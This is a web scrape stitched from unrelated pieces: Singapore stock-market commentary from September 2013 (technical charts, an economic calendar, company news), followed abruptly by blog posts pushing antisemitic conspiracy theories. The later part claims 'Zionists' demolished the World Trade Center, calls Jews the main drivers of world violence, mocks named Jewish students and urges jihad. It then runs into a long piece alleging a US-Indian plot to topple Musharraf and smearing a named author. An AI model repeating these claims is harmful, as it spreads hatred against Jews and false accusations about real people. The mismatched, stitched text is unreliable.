Chart 7: King Wan – Likely To Range Trade Between $0.280–0.310

Source: CIMB itrade complimentary chart (20 Sep 13)

5. Sino Grandness Food Industrial Group – 20 September Close: $1.270.

Based on Chart 8 below, Sino Grandness seems to have broken the downtrend line established since late July. Notwithstanding the strengthening indicators such as RSI and MACD, Sino Grandness has to clear a confluence of resistances around $1.290-1.315 with volume expansion to be bullish.

Besides the technical perspective, it is noteworthy that Sino Grandness has several potential developments in the next two months which may increase the probability of a breakout:

a) EGM on 23 September. Price may be supported as company would have the opportunity to brief shareholders on company’s developments;

b) Kim Eng luncheon on 24 September;

c) Appointment of investment bankers likely in four to six weeks;

d) Wuhan trade fair and analyst plant tour 5-8 October;

e) Standard Chartered seminar – Late October

Notwithstanding the above potential developments, it is noteworthy that the dates are tentative in nature.

Chart 8: Sino Grandness – Seems To Be On The Verge Of Breakout

Source: CIMB itrade complimentary chart (20 Sep 13)

It is noteworthy that the above mentioned stocks are small cap stocks and they are likely to be more volatile than blue chips. In other words, they may drop more than the market if market weakens.

Please note that the above is my personal opinion and may not cater to your specific risk profile etc. The question of when to buy / sell and what to buy / sell differs greatly from individual to individual. Furthermore, it is extremely important to bear in mind that the market outlook is never static. It can change suddenly if there are sudden big events unfolding from the market – some events can happen as quickly as a few hours.

STI Supports And Resistances Are: Current: 3,237.53

Support 2: 3,184 – 3,188

Resistance 1: 3,260

Resistance 2: 3,269

Resistance 3: 3,278 – 3,281

Resistance 4: 3,304

*Supports and resistances are not static levels. They may be subject to change daily.

Summary Of Economic Calendar For The Week Ahead (SIN Time)

22 Sep, Sun: (EUR) German Federal Elections;

23 Sep, Mon: (CNY) HSBC Flash Manufacturing PMI; (EUR) Germany, French & Europe Flash Manufacturing & Services PMI / ECB President Draghi Speaks; (USD) Flash Manufacturing PMI / FOMC Member Dudley Speaks;

24 Sep, Tues: (EUR) German IFO Business Climate; (USD) CB Consumer Confidence / Richmond Manufacturing Index / FOMC Member George Speaks;

25 Sep, Wed: (USD) Core Durable Goods Orders m/m / New Home Sales / Crude Oil Inventories;

26 Sep, Thurs: (GBP) Final GDP q/q; (USD) Unemployment Claims / Final GDP q/q / Pending Home Sales m/m / FOMC Member Stein Speaks;

27 Sep, Fri: (EUR) ECB President Draghi Speaks; (USD) FOMC Member Rosengren Speaks / Personal Income & Spending / Revised UoM Consumer Sentiment / FOMC Member Evans Speaks / FOMC Member Dudley Speaks;

*All economic data especially China data (if any) are subject to changes without notice. The above list is not exhaustive. I have merely listed the economic data which I feel has more impact to the market.

Please refer to Forex Factory Calendar for a more detailed / up to date list of economic events.

Information sources: Various sources such as Bloomberg, Daily FX, Dow Jones, Forex calendar, Zacks Investment Research, Reuters, SGX, Yahoo Finance, and Business Times etc.

All the best for your investment and trading!

Posted: 23 Sep 2013 12:28 AM PDT

Observations/Insights - German chancellor Merkel to retain her post as widely expected; CDU/CSU bloc receives nearly 42% of the vote but loses junior coalition party FDP as it fails to reach 5% Parliamentary threshold; Likely to be forced to reach out to the main opposition party SPD to form a “grand coalition” with center left. - Stronger than expected China flash PMI lifts Shanghai Composite by 0.5% in the morning session; Figure marks 2nd month of expansion and a 6-month high, while HSBC chief Asia economist anticipates “a more sustained recovery as the further filtering-through of fine-tuning measures lift domestic demand.” - Russia-US tensions on Syria escalate as Russian Foreign Min accuses US of seeking to orchestrate regime change. - Tokyo on holiday break; HKEX cancels pre-market trading/delays regular market trading due to Typhoon signal No.8

Fixed Income/Commodities/Currencies - (KR) South Korea sells 20-yr govt Bonds; avg yield 3.625% - GLD: SPDR Gold Trust ETF daily holdings fall by 1.8 tonnes to 910.2 tonnes – update as of 9/20 - (CN) Daily Shibor fixings: 1-week: 4.2320% v 3.7490% prior (3rd consecutive rise; 3-week high)

- USD/CNY: (CN) PBoC sets yuan mid point at 6.1475 v 6.1212 prior close (record high setting for Yuan) - USD/INR: DB see the end of the pronounced INR weakness; Forecasts INR62 target for the next 6 months and INR60 in the next 12 months – financial press - USD/INR: INR currency (Rupee) slightly higher in early trade around INR62.50 against the USD

- AUD/USD is the largest gainer among the dollar majors, rising above $0.9430 or up over 60pips from the lows following better than expected China flash PMI; AUD/JPY up 60pips as well as high as ¥93.55, while NZD/USD was up 35pips above $0.8375. - USD/JPY, EUR/USD in narrow 25pip ranges around ¥99.20 and $1.3530 respectively.

Speakers/Political/In the Papers - (CN) China 2013 CPI may be +2.7% y/y v +3.5% official target; Export growth may be +9.0% y/y v +8.3% official target – People’s Daily - (CN) China Qinhuangdao coal price falls to CNY525-540/ton – Chinese press - (CN) China completes preliminary audit on local govt debt – Chinese press - (CN) China Federation of Logistics and Purchasing: China posted a 9.5% y/y YTD growth to CNY127T in goods moving around the country as of Aug-end – Shanghai Daily

- (JP) Japan chief TPP negotiator: “We’ve succeeded in laying the groundwork to raise the negotiations to the political level” & # 8211; Nikkei News - (KR) Federation of Korean Industries (FKI): 73.8% of polled economists and academics concerned Korean economy faces a high probability of a Japan-style malaise – Korean press - (KR) South Korea Fin Min Hyun: To continue monitoring financial markets and remain on alert amid expectation of inevitable Fed taper – Korean press - (KR) South Korea Pres Park may trim some of her pledges on welfare – Korean press

- (DE) Follow up: German national election results show Merkel’s CDU/CSU block at 41.5%, SPD (opposition) at 25.7%, FDP (jr coalition) at 4.7%; Greens 8.4%, AfD 4.7%, Linke 8.6% with all districts counted – financial press - (DE) German Fin Min Schaeuble: Willing to stay on as minister; Believes Germany can continue its European policy - (IT) Italy Fin Min Saccomanni threatens to resign if the govt scorns EU deficit spending limits and enacts tax cuts – Italian press - (SI) Slovenia central bank gov Jazbec: Next few weeks are crucial for Slovenia as it struggles to avoid a bailout – prensa

- (EG) Egypt governing committee spokesperson: May rewrite the entire constitution drafted by the Mursi govt - (SY) Russia Foreign Min Lavrov: White House is blackmailing Russia to endorse a tough UN resolution on Syria; Prepared to send ground troops to Syria – prensa

Equities Markets Snapshot (as of 03:30 GMT): - Nikkei225 closed, S&P/ASX -0.5%, Kospi +0.4%, Shanghai Composite +0.7%, Hang Seng delayed (due to typhoon), Dec S&P500 +0.2% at 1,705, Dec gold -0.9% at $1,321, Nov crude oil flat at $104.75/brl

US markets: - AAPL: German group claims to have hacked fingerprint scanner of the iPhone – financial press - GE: Awarded a $2.2B contract to provide turbines for six power plants in Algeria with capacity of 8.4K MW – press - C: Said to have suffered a large decline in trading revenue which may weigh on its earnings – FT

Notable movers by sector (**NOTE: Japan markets closed for holiday): - Consumer discretionary: Qantas Airways Ltd QAN. AU -0.7% (authorities investigate near-crash incident on Friday), Treasury Wine Estates TWE. AU -7.4% (CEO resigns; reaffirms FY14 EBIT guidance) - Telecom: Fiberhome Telecommunication Technologies Co Ltd 600498.CN +5.4% (China to expand broadband investment) - Industrials: Elders ELD. AU +10.0% (Ruralco may sell its stake), Daikin Industries 6367.JP (to build Mexico facility), Toyota Tsusho Corp 8015.JP (enters into cooperate agreement with Air Liquide), BYD Company Limited 002594.CN +5.0% (China to promote new energy cars for 2013-15) - Materials: Peak Resources PEK. AU +4.8% (update on Ngualla Rare Earth Project funding), Red Fork Energy Limited RFE. AU -2.1% (Sep production results), Newcrest Mining Ltd NCM. AU -7.3% (FY14 gold production guidance) - Financials: Macquarie Group Limited MQG. AU -1.7% (H1 guidance broadly in line with H2 2013) - Energy: Cooper Energy Ltd COE. AU +2.5% (commencement of well drilling campaign in Cooper Basin)

Economic Data - (CN) CHINA SEPT HSBC/MARKIT FLASH MANUFACTURING PMI: 51.2 V 50.9E (2nd consecutive month of expansion, 6-month high) - (TW) TAIWAN AUG UNEMPLOYMENT RATE: 4.2% V 4.2%E

This article originally appeared on www. stockmarketsreview. com. and is reproduced here as part of our collaboration with StockMarketsReview. com

Posted: 22 Sep 2013 11:18 PM PDT

YHM Wins US$183m Contract YHM Group announced that it had secured a contract worth approximately US$183 million over a three-year period with an additional two-year extendable option to provide a semi-submersible rig. The rig will be used by a Southeast Asian based national oil company to support its oil and gas activities in the Andaman Sea. To be funded through internal resources as well as bank borrowings, the company is currently in the midst of forming a joint venture company to own the semi-submersible rig, which will be upgraded and refurbished. The rig is expected to be deployed between end 2013 and early 2014.

Significance: Notably, YHM notes that the contract win might have a positive contribution to the company's consolidated revenue for the financial year ending 31 December 2013 and could help lift YHM's financial performance after reporting a decline in revenue and earnings for 1H13.

Qualified Opinion Issued By Cacola's Auditors A qualified opinion has been issued by the auditors of Cacola Furniture International for its consolidated financial statements for the year ended 31 December 2012. On the part of where the qualification lies, the auditors have singled out "inventories" and "recoverability of prepayment made to a contractor" as qualified items. In the qualified opinion, the auditors quoted that significant variances between the quantities stated in the stock count sheets and the final inventory listing as at 31 December 2012 were seen. Sufficient audit evidence to ascertain the appropriateness of the costs capitalised for work-in-progress and finished goods were also not obtained, thereby further questioning the true value of the Rmb33.2 million listed on Cacola's sheets. Cacola has also not been able to justify if the Rmb31.6 million made to the contractor for the construction of a new megastore, which is currently not proceeding, will be recoverable if it decides to abort the megastore project.

Significance: As of figures provided by Cacola's auditors, the net loss before tax of Cacola for 31 December 2012 stood at Rmb30.1 million. This is coupled with a net current liabilities standing of Rmb32.4 million. Adjusting the above items seen for its inventories and prepayment, the liabilities could be much bigger, spiralling an even bigger net loss.

Growing Its Footprint In Azerbaijan: Keppel Jointly developed by Keppel Offshore & Marine, State Oil Company of Azerbaijan Republic and Azerbaijan Investment Company, a new shipbuilding yard was officially opened. The Baku Shipyard, a new 62-hectare yard, is designed to undertake the construction of a wide range of specialised vessels and merchant ships. The Baku Shipyard adds to the existing footprint that Keppel O&M has in Azerbaijian. Keppel O&M will be responsible for the management and operation of the yard. The yard is already in discussions on several potential new projects ahead of its opening, and has received two contracts worth about US$50 million in total.

Significance: The opening of Baku Shipyard demonstrates Keppel O&M's commitment to be a long term solutions provider for Azerbaijan. The Baku Shipyard also reinforces Keppel O&M's Near Market, Near Customer strategy that enables it to unlock synergy in its Caspian operations.

Posted: 22 Sep 2013 08:29 PM PDT

Fast Track Solution To Diversify Into Renewable Energy Sector Fast Track Solution Holdings' subsidiary, Solar Interactive (SI), entered into a renewable energy power purchase agreement with Tenaga Nasional (TN) for the sale and delivery of renewable energy by SI to TN for a concession period of 21 years. SI would construct a 500kW (kilowatt) solar power plant in Kinta, Perak in order to carry out the agreement, expected to commence in December 2013. Presently, Fast Track Solution is an investment holding company as well as marketer and distributor of software solutions. The proposed diversification is part of the firm's plan to reduce its reliance on its existing core business and obtain other revenue sources.

Significance: The renewable energy business has a fixed rate-tariff of RM1.3812/kWh at which SI may sell electricity to TN during the period and may potentially contribute more than 25 percent of Fast Track Solution's net profit when fully operational.

Tan Chong Motor To Build Vehicle Plant In Myanmar Through its Labuan-based subsidiary, ETCM, Tan Chong Motor Holdings (TCMH) obtained the approval from the Myanmar Investment Commission to manufacture and market motor vehicles at the industrial area of Bago Region in Myanmar. ETCM will establish a new subsidiary, Tan Chong Motor (Myanmar), to undertake the project. The permit, which would last for 50 years with options to extend for further periods of two terms of 10 years each, will provide certain tax exemptions and reliefs applicable upon implementation of the project as provided for under the Myanmar Foreign Investment Law.  The plant is projected to have an initial production capacity of 9,100 units per annum based on one shift for the first five years. Construction of the plant will commence within one year from the date of the permit and is expected to be completed in three years. The total investment from TCMH to fund the construction of assembly plant and showroom, purchase of machineries and equipment for the initial first three years is estimated at US$50 million.

Significance: This is part of TCMH's expansion plan to set a foothold in one of ASEAN's last emerging markets in anticipation of Myanmar's growth potential.

Wah Seong Secures RM232.1m Contract From Petronas Carigali Wah Seong Corporation's pipe coating business unit has been awarded a RM232.1 million contract to provide Anti Corrosion Coating, Internal Flow Coating and Concrete Weight Coating for the EVA-NMB Gas Delivery System (ENGDS) project, co-owned by Petronas Carigali. The contract comprises coating of approximately 250 kilometres of pipes. Works are expected to begin in 4Q13 and be completed by the second quarter of 2014. The ENGDS project will see the development and commercialisation of nine stranded gas fields together with the development of a new gas gathering, processing and transportation hub in Peninsular Malaysia.

Significance: The contract, which is project specific and not renewable, is expected to contribute positively to Wah Seong's bottom line over the contract period. 

Posted: 22 Sep 2013 08:19 PM PDT

Apple Inc. (AAPL-NASDAQ) released the new iPhone 5S Friday, which includes a faster processor, better camera and a new fingerprint scanner. The Apple iPhone second model, iPhone 5C, repackaged much of the technology from last year’s model in a new colorful plastic case. Demand for the gold-colored 5S was so strong in China and Hong Kong that Apple has already asked its suppliers to increase production of the gold colored model.

Features on the new flagship iPhone – iOS 7 – Apple’s new operating system which includes an Activation Lock feature that can render an iPhone, iPad and iPod Touch useless to thieves. The ‘kill switch’ works by requiring user to enter an Apple ID and password in order to turn off the phone’s “Find My iPhone” feature or to erase any data on the phone. The owner must first sign on to iCloud or use the “Find My iPhone” App. Secure Our Smartphones, a coalition of law-enforcement officers, elected officials and consumer advocates, had pressured phone manufacturers to improve their security.

According to the Federal Communications Commission, cell phone theft makes up 30% – 40% of robberies, nationwide. During 2012, over 1.6 million people had their phones stolen.

According to data on website for New York Attorney General Eric Schneiderman, approximately 113 smartphones are stolen or lost every minute in the USA. During the first nine months of last year a total of 11,447 cases of stolen iPhones and other devices were reported to the New York City Police Department, an increase of 3,280 from year before. Reportedly in San Francisco, nearly half of all robberies are Smartphone related.

Samsung Electronics Co. Ltd. – key Smartphone rival of Apple – sold 71.3 million smartphones during Q2 2013 which was more than double the number of smartphones sold by Apple during same period, with only 31.9 million Smartphones sold during same period.

Caterpillar Sales Down In a securities filing on Friday, heavy equipment maker Caterpillar Inc. (CAT-NYSE) shares were lower by 1% into early morning trading. The company reported worldwide retail machine sales extended their slump over the last three months, falling 10% in August, down 9% in July and off by 8% in June from same periods in 2012. During August in North America, machine retail sales edged up 1% but, fell in every other region, including a 30% decline in Asia.

Darden Plans Cost Cutting Darden Restaurants, Inc. (DRI-NYSE) shares were off by 6% into late morning trading Friday after reporting fiscal Q1 profit fell more than expected to $70.2 million. The restaurant giant said it would implement a cost-cutting plan.

Goodyear Brings Back Dividend The largest U. S. based tire producer, The Goodyear Tire & Rubber Company (GT-NASDAQ), announced on Friday, they will pay a 5-cent per share common stock dividend effective December 1, its first dividend paid since December 2002. The tire maker also will repurchase as much as $100 million of its common stock with the repurchase program intended to offset new shares issued under equity compensation programs. For the American industry icon, the return of the dividend signals an end to a hard-fought turnaround effort designed to return this American industry icon to profitability while helping it navigate economic downturns both in the U. S. and abroad.

Prosensa Shares Slammed Prosensa Holding N. V. (RNA-NASDAQ) shares were slammed on Friday, down 69% into late morning trading after announcing, along with GlaxoSmithKline plc (GSK-NYSE), that their muscular dystrophy treatment failed to meet a primary endpoint.

This article originally appeared on www. stockmarketsreview. com. and is reproduced here as part of our collaboration with StockMarketsReview. com

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" ( The people in Oaxaca ) they hate the APPO. They hate them so much they want to hurt them and kill them. " - Brian Conolly, Boston Indy Media Center.

Hillel House kosher crackers on warfare safari wilding in third word countries drawing the fire of paramilitaries onto local peasants

Why are angry jewish kids from Harvard stealing and burning buses, harrasing locals, and spreading tourism ruining rumours around the world in Mexico ?

Who is paying for their street blocking. bus burning, regime overthrowing armed extortionists drug habits and why ?

"Inversely, if Mexico. Syria or Iraq kept better tabs on Bradley Will, Brian Conolly, Kelly Lee, or Mike Wartofsky, then various wannabe revolutionary human intelligence and armed struggle students could be screened out of the international hospitality process. I am not talking about keeping Peter Tosh from his reggae performances with a red X. I am talking about keeping crackers on warfare safari from wilding in third world countries while drawing the fire of paramilitaries onto local peasants."

Mike Gould-Wartofsky "gets made" by George Soros by FLIPSIDE

Harvard's Communist Crown Prince, Mike Gould-Wartofsky

has graduated. Now, naturally we get to hear what a

horrible experience that was, having our professional

socialist academic Mum and Dad (Carol Gould, Marx

Wartofsky) send him to the nation's top Ivy League

colegio. Naturally, the expose of how fascist and evil

Harvard was will be featured in the nation's top

publications as Wartofsky is embraced as the new

darling of The Nation magazine, and as the whole

scroll of guaranteed leftist publishing and

syndication invitations extends, and this pampered

graduate begins to drink ever more deeply from the

giant teat of leftist media largesse. Felicitaciones

Read the full article here:

Saturday, January 19, 2008

Gandhi: "Israel" and the Jews are the biggest players in a culture of violence

http://www. eappi. org/eappiphotos. nsf/collectionslist/42.html

Gandhi: Jewish identity in the future appears bleak, "Israel" and the Jews are the biggest players in a culture of violence.

The Jewish identity in the future appears bleak. Any nation that remains anchored to the past is unable to move ahead and, especially a nation that believes its survival can only be ensured by weapons and bombs. In Tel Aviv in 2004 I had the opportunity to speak to some Members of Parliament and Peace activists all of whom argued that the wall and the military build-up was necessary to protect the nation and the people. In other words, I asked, you believe that you can create a snake pit -- with many deadly snakes in it -- and expect to live in the pit secure and alive? Qué quieres decir? they countered. Well, with your superior weapons and armaments and your attitude towards your neighbors would it not be right to say that you are creating a snake pit? How can anyone live peacefully in such an atmosphere.

We have created a culture of violence (Israel and the Jews are the biggest players) and that Culture of Violence is eventually going to destroy humanity.

"He was doing God's work,"

Immediately following the UN take over of the US Canadian EU funded AU PAE troops occupying Darfur Sudan and George Bushes signing of the Sudan Accountability and Divestment Act (of war) " Instant Karma " strikes a US Agent in Sudan. John Granville USAID/SFO Sudan and Nairobi, Kenya The institution of private land ownership being a major imperialist strategy. Read more about John's radio distribution project (PDF, 223 KB)

Monday, December 31, 2007

US zionists take out Pakistan by removing US agent Bhutto

The US Zionist Imperialist Plan To Topple Pakistan Military and ISI

- Destabilize Pakistan, devalue Karachi stock exchange - Seize Balochistans large gas reserves - Seize control of Pakistan's ports (like Panama and Kuwait ) - Cut China off, Get control of Chinas money and economy. Cut China off. - Pump up New York Zionists insider and Forrex trading. - Drive up value of gold, platnium and diamond holdings.

- Eclipse coverage of Palestine and Iraq with Muslim on Muslim on Hindu blood shed. - Re write Pakistan's laws, constitution and elections to US Banker/billionaires liking. - Send in US troops to slaughter pro Taliban milllions. - Control Caspian sea gas reserves to India markets pipeline.

- Cut off currency flow to Islamic and targeted countries.

-Stop currency flight from US economy via Pakistani and other expatriates and immigrants (Mexican)

Pakistan is an Islamic republic targeted for bloody destabilization and economic destruction by the zionist controlled US and zionist owned US media.

Zionists moved out of then demolished the world trade centers and blamed those opposed to their genocidal conquest of the middle east for their handi work.

If Pakistan (ISI) is involved in that its because they tried to stop it and zionists set them up to throw them in a bad light.

Democracy is when people are tricked in to fighting with each other over crumbs while New York money people make off with the whole pie.

Bhutto was a billionaire connected US CIA/CFR agent so its probable she is in Dubai now with her dad telegraphing anti Pakistan psychological operations communications to Mark Siegle her Jewish PR firm in New York like AIPAC spokesman Wolf Blitzer claimed she did for him.

Pakistan was leading a asia/islamic bloc rebellion in the UN against david rubiensteins PAE/Lockheed carlyle group invasion of the oil, uranium, thorium, copper, aquifer, gum arabic region of Darfur Sudan.

Pakistan was seeing solid gains and confidence in its stockmarket.

Billions of now discredited dollars flow from the Pakistani expatriate community in the US to the economy there to the chagrin of US malls and the owners of the Federal Reserve Bank Corporation.

Pakistan was developing nicely with Chinese money.

The Soros OSI "election", legal reforms funded by the part US owned Asia Development Bank, The incarcerated judges from Henry Kissinger's ICG International Crisis Group, Media Benjamin of Soros funded Move On

Billioniare US Agent Bhutto from the Council On Foreign Relations and Harvard "democracy", the "assassination", the Jewish billionaires daughters cricket star husband, demonizing musharraf, the Houston TX based PPP's riots.

are ALL weapons in the US Zionist war on Muslims. Islam. Pakistan and China.

As such they are all doomed. DOOOOOOOOMED !

Down with zionism, imperialism and all its machinations and minions.

Victory to the new intifada, Jihad and the Islamic republic of earth.

Down with the corporation know as the Federal Reserve Bank.

Up with sharia anti capitalist banking.

This is not about Musharraf anymore. This is about clipping the wings of a strong Pakistani military, denying space for China in Pakistan, squashing the ISI, stirring ethnic unrest, and neutralizing Pakistan's nuclear program.

The first shot in this plan was fired in Pakistan's Balochistan province in 2004. The last bullet will be toppling Musharraf, sidelining the military and installing a pliant government in Islamabad. Musharraf shares the blame for letting things come this far. But he is also punching holes in Washington's game plan. He needs to be supported.

ISLAMABAD. Pakistan — On the evening of Tuesday, 26 September, 2006, Pakistani strongman Pervez Musharraf walked into the studio of Comedy Central's 'Daily Show' with Jon Stewart, the first sitting president anywhere to dare do this political satire show.

Stewart offered his guest some tea and cookies and played the perfect host by asking, "Is it good?" before springing a surprise: "Where's Osama bin Laden?"

"I don't know," Musharraf replied, as the audience enjoyed the rare sight of a strong leader apparently cornered. " You know where he is?" Musharraf snapped back, "You lead on, we'll follow you."

What Gen. Musharraf didn't know then is that he really was being cornered. Some of the smiles that greeted him in Washington and back home gave no hint of the betrayal that awaited him.

As he completed the remaining part of his U. S. visit, his allies in Washington and elsewhere, as all evidence suggests now, were plotting his downfall. They had decided to take a page from the book of successful 'color revolutions' where western governments covertly used money, private media, student unions, NGOs and international pressure to stage coups, basically overthrowing individuals not fitting well with Washington's agenda.

This recipe proved its success in former Yugoslavia, and more recently in Georgia, Ukraine and Kazakhstan.

In Pakistan, the target is a Pakistani president who refuses to play ball with the United States on Afghanistan, China, and Dr. A. Q. Khan.

To get rid of him, an impressive operation is underway:

• A carefully crafted media blitzkrieg launched early this year assailing the Pakistani president from all sides, questioning his power, his role in Washington's war on terror and predicting his downfall.

• Money pumped into the country to pay for organized dissent.

• Willing activists assigned to mobilize and organize accessible social groups.

• A campaign waged on Internet where tens of mailing lists and 'news agencies' have sprung up from nowhere, all demonizing Musharraf and the Pakistani military.

• European - and American-funded Pakistani NGOs taking a temporary leave from their real jobs to work as a makeshift anti-government mobilization machine.

• U. S. government agencies directly funding some private Pakistani television networks; the channels go into an open anti-government mode, cashing in on some manufactured and other real public grievances regarding inflation and corruption.

• Some of Musharraf's shady and corrupt political allies feed this campaign, hoping to stay in power under a weakened president.

• All this groundwork completed and chips in place when the judicial crisis breaks out in March 2007. Even Pakistani politicians surprised at a well-greased and well-organized lawyers campaign, complete with flyers, rented cars and buses, excellent event-management and media outreach.

• Currently, students are being recruited and organized into a street movement. The work is ongoing and urban Pakistani students are being cultivated, especially using popular Internet Web sites and 'online hangouts'. The people behind this effort are mostly unknown and faceless, limiting themselves to organizing sporadic, small student gatherings in Lahore and Islamabad, complete with banners, placards and little babies with arm bands for maximum media effect. No major student association has announced yet that it is behind these student protests, which is a very interesting fact glossed over by most journalists covering this story. Only a few students from affluent schools have responded so far and it's not because the Pakistani government's countermeasures are effective. They're not. The reason is that social activism attracts people from affluent backgrounds, closely reflecting a uniquely Pakistani phenomenon where local NGOs are mostly founded and run by rich, westernized Pakistanis.

All of this may appear to be spur-of-the-moment and Musharraf-specific. But it all really began almost three years ago, when, out of the blue and recycling old political arguments, Mr. Akbar Bugti launched an armed rebellion against the Pakistani state, surprising security analysts by using rockets and other military equipment that shouldn't normally be available to a smalltime village thug. Since then, Islamabad sits on a pile of evidence that links Mr. Bugti's campaign to money and ammunition and logistical support from Afghanistan, directly aided by the Indians and the Karzai administration, with the Americans turning a blind eye.

For reasons not clear to our analysts yet, Islamabad has kept quiet on Washington's involvement with anti-Pakistan elements in Afghanistan. But Pakistan did send an indirect public message to the Americans recently.

"We have indications of Indian involvement with anti-state elements in Pakistan ," declared the spokesman of the Pakistan Foreign Office in a regular briefing in October. The statement was terse and direct and the spokesman, Ms. Tasnim Aslam, quickly moved on to other issues.

This is how a Pakistani official explained Ms. Aslam's statement: "What she was really saying is this: We know what the Indians are doing. They've sold the Americans on the idea that [the Indians] are an authority on Pakistan and can be helpful in Afghanistan. The Americans have bought the idea and are in on the plan, giving the Indians a free hand in Afghanistan. What the Americans don't know is that we, too, know the Indians very well. Better still, we know Afghanistan very well. You can't beat us at our own game."

Mr. Bugti's armed rebellion coincided with the Gwadar project entering its final stages. No coincidence here. Mr. Bugti's real job was to scare the Chinese away and scuttle Chinese President Hu Jintao's planned visit to Gwadar a few months later to formally launch the port city.

Gwadar is the pinnacle of Sino-Pakistani strategic cooperation. It's a modern port city that is supposed to link Central Asia, western China, and Pakistan with markets in Mideast and Africa. It's supposed to have roads stretching all the way to China. It's no coincidence either that China has also earmarked millions of dollars to renovate the Karakoram Highway linking northern Pakistan to western China.

Some reports in the American media, however, have accused Pakistan and China of building a naval base in the guise of a commercial seaport directly overlooking international oil shipping lanes. The Indians and some other regional actors are also not comfortable with this project because they see it as commercial competition.

What Mr. Bugti's regional and international supporters never expected is Pakistan moving firmly and strongly to nip his rebellion in the bud. Even Mr. Bugti himself probably never expected the Pakistani state to react in the way it did to his betrayal of the homeland. He was killed in a military operation where scores of his mercenaries surrendered to Pakistan army soldiers.

U. S. intelligence and their Indian advisors could not cultivate an immediate replacement for Mr. Bugti. So they moved to Plan B. They supported Abdullah Mehsud, a Pakistani Taliban fighter held for five years in Guantanamo Bay, and then handed over back to the Afghan government, only to return to his homeland, Pakistan, to kidnap two Chinese engineers working in Balochistan, one of whom was eventually killed during a rescue operation by the Pakistani government.

Islamabad could not tolerate this shadowy figure, who was creating a following among ordinary Pakistanis masquerading as a Taliban while in reality towing a vague agenda. He was rightly eliminated earlier this year by Pakistani security forces while secretly returning from Afghanistan after meeting his handlers there. Again, no surprises here.

This is where Pakistani political and military officials finally started smelling a rat. All of this was an indication of a bigger problem. There were growing indications that, ever since Islamabad joined Washington's regional plans, Pakistan was gradually turning into a 'besieged-nation', heavily targeted by the American media while being subjected to strategic sabotage and espionage from Afghanistan.

Afghanistan. under America's watch, has turned into a vast staging ground for sophisticated psychological and military operations to destabilize neighboring Pakistan.

During the past three years, the heat has gradually been turned up against Pakistan and its military along Pakistan's western regions:

• A shadowy group called the BLA, a Cold War relic, rose from the dead to restart a separatist war in southwestern Pakistan.

• Bugti's death was a blow to neo-BLA, but the shadowy group's backers didn't repent. His grandson, Brahmdagh Bugti, is currently enjoying a safe shelter in the Afghan capital, Kabul, where he continues to operate and remote-control his assets in Pakistan.

• Saboteurs trained in Afghanistan have been inserted into Pakistan to aggravate extremist passions here, especially after the Red Mosque operation.

• Chinese citizens continue to be targeted by individuals pretending to be Islamists, when no known Islamic group has claimed responsibility.

• A succession of 'religious rebels' with suspicious foreign links have suddenly emerged in Pakistan over the past months claiming to be 'Pakistani Taliban'. Some of the names include Abdul Rashid Ghazi, Baitullah Mehsud, and now the Maulana of Swat. Some of them have used and are using encrypted communication equipment far superior to what Pakistani military owns.

• Money and weapons have been fed into the religious movements and al Qaeda remnants in the tribal areas.

Exploiting the situation, assets within the Pakistani media started promoting the idea that the Pakistani military was killing its own people. The rest of the unsuspecting media quickly picked up this message. Some botched American and Pakistani military operations against Al Qaeda that caused civilian deaths accidentally fed this media campaign.

This was the perfect timing for the launch of Military, Inc. Inside Pakistan's Military Economy. a book authored by Dr. Ayesha Siddiqa Agha, a columnist for a Pakistani English-language paper and a correspondent for 'Jane's Defence Weekly', a private intelligence service founded by experts close to the British intelligence.


The book was launched in Pakistan in early 2007 by Oxford Press. And, contrary to most reports, it is openly available in Islamabad's biggest bookshops. The book portrays the Pakistani military as an institution that is eating up whatever little resources Pakistan has.

Pakistani military's successful financial management, creating alternate financial sources to spend on a vast military machine and build a conventional and nuclear near-match with a neighboring adversary five times larger – an impressive record for any nation by any standard – was distorted in the book and reduced to a mere attempt by the military to control the nation's economy in the same way it was controlling its politics.

The timing was interesting. After all, it was hard to defend a military in the eyes of its own proud people when the chief of the military is ruling the country, the army is fighting insurgents and extremists who claim to be defending Islam, grumpy politicians are out of business, and the military's side businesses, meant to feed the nation's military machine, are doing well compared to the shabby state of the nation's civilian departments.

A closer look at Ms. Siddiqa, the author, revealed disturbing information to Pakistani officials. In the months before launching her book, she was a frequent visitor to India where, as a defense expert, she cultivated important contacts. On her return, she developed friendship with an Indian lady diplomat posted in Islamabad. Both of these activities – travel to India and ties to Indian diplomats – are not a crime in Pakistan and don't raise interest anymore. Pakistanis are hospitable and friendly people and these qualities have been amply displayed to the Indians during the four-year-old peace process.

What is interesting is that Ms. Siddiqa left her car in the house of the said Indian diplomat during one of her recent trips to London. And, according to a report, she stayed in London at a place owned by an individual linked to the Indian lady diplomat friend in Islamabad.

The point here is this: Who assigned her to investigate the Pakistani Armed Forces and present a distorted image of a proud an efficient Pakistani institution?

From 1988 to 2001, Dr. Siddiqa worked in the Pakistan civil service, the Pakistani civil bureaucracy. Her responsibilities included dealing with Military Accounts, which come under the Pakistan Ministry of Defense. She had thirteen years of rich experience in dealing with the budgetary matters of the Pakistani military and people working in this area.

Dr. Siddiqa received a year-long fellowship to research and write a book in the United States. There are strong indications that some of her Indian contacts played a role in arranging financing for her book project through a paid fellowship. The final manuscript of her book was vetted at a publishing office in New Delhi.

All of these details are insignificant if detached from the real issue at hand. And the issue is the demonization of the Pakistani military as an integral part of the media siege around Pakistan, with the American media leading the way in this campaign.

Some of the juicy details of this campaign include:

• The attempt by Dr. Siddiqa to pitch junior officers against senior officers in Pakistan Armed Forces by alleging discrimination in the distribution of benefits. Apart from being malicious and unfounded, her argument was carefully designed to generate frustration and demoralize Pakistani soldiers.

• The American media insisting on handing over Dr. A. Q. Khan to the United States so that a final conviction against the Pakistani military can be secured.

• Mrs. Benazir Bhutto demanding after returning to Pakistan that the ISI be restructured; and in a press conference during her house arrest in Lahore in November she went as far as asking Pakistan army officers to revolt against the army chief, a damning attempt at destroying a professional army from within.

Some of this appears to be neerily similar to the campaign waged against the Pakistani military in 1999, when, in July that year, an unsigned full page advertisement appeared in major American newspapers with the following headline: "A Modern Rogue Army With Its Finger On The Nuclear Button."

Till this day, it is not clear who exactly paid for such an expensive newspaper full-page advertisement. But one thing is clear: the agenda behind that advertisement is back in action.

Strangely, just a few days before Mrs. Bhutto's statements about restructuring the ISI and her open call to army officers to stage a mutiny against their leadership, the American conservative magazine The Weekly Standard interviewed an American security expert who offered similar ideas:

